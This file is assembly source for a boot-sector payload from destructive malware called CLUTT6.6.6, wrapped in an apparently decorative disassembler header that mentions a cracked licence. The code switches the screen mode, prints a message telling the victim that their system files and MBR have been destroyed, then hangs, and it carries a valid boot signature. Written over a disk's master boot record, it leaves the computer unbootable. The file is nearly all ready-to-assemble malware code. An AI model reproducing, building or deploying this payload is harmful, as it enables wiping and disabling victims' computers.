;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2024 Hex-Rays, <support@hex-rays.com>           |
; |                      License info: 48-2137-ACAB-99                      |
; |                            Horion-Crack-2015                            |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : 482F9B77186BDE13EACC04C967A700E22F3CE4C4CBB7F2AFBF0298FFE3B41743
; Input MD5    : B2BC679735AAF118B7F4E39C94B0A354
; Input CRC32  : C5925CC6

; ---------------------------------------------------------------------------
; File Name   : D:\!Files\github\Athree7\new\builds\Bx86\python\clutt6.6.6.bin
; Format      : Binary file
; Base Address: 0000h Range: 0000h - 0200h Loaded length: 0200h
; ===========================================================================
[BITS 16]
[ORG 7C00h]
; Segment type: Pure code
                jmp     root1
; ---------------------------------------------------------------------------

root1:                                  ; CODE XREF: seg000:0000↑j
                xor     ax, ax
                mov     ds, ax
                cld
                mov     ax, 0012h
                int     10h             ; - VIDEO - SET VIDEO MODE
                                        ; AL = mode
                mov     si, 7C24h
                mov     bl, 12
                call    printstrroot
                jmp     $

loc_14:                                 ; CODE XREF: seg000:loc_14↓j
                jmp     short loc_14

; =============== S U B R O U T I N E =======================================


printstrroot:                   ; CODE XREF: seg000:0011↑p
                mov     bh, 0

printroot:                                 ; CODE XREF: sub_16+B↓j
                lodsb
                cmp     al, 0
                je      doneroot
                mov     ah, 0Eh
                int     10h             ; - VIDEO - WRITE CHARACTER AND ADVANCE CURSOR (TTY WRITE)
                                        ; AL = character, BH = display page (alpha modes)
                                        ; BL = foreground color (graphics modes)
                jmp     printroot
; ---------------------------------------------------------------------------

doneroot:                              ; CODE XREF: sub_16+5↑j
                ret

; ---------------------------------------------------------------------------
string db "CLUTT6.6.6", 13, 10, "", 13, 10, "YOUR SYSTEM WAS DESTROYED BY CLUTT6.6.6!", 13, 10, "ALL YOUR SYSTEM FILES AND MBR HAVE BEEN VERY DAMAGED!", 13, 10, "WHY DID YOU AGGRESSIVELY DESTROY YOUR SYSTEM? NOW IS LATE AND EVE",13 ,10, "RYTHING IS DESTROYED! YOUR MIND MUST BE VERSED AND DISGUSTING! AS", 13, 10 " YOUR SYSTEM, YOU WILL SUFFER IN HELL! FOREVER! GLORY TO SATAN!", 13, 10, "", 13, 10, "", 13, 10, "ENJOY LIFE IN HELL!"

times 510 - ($-$$) db 0
dw      0AA55h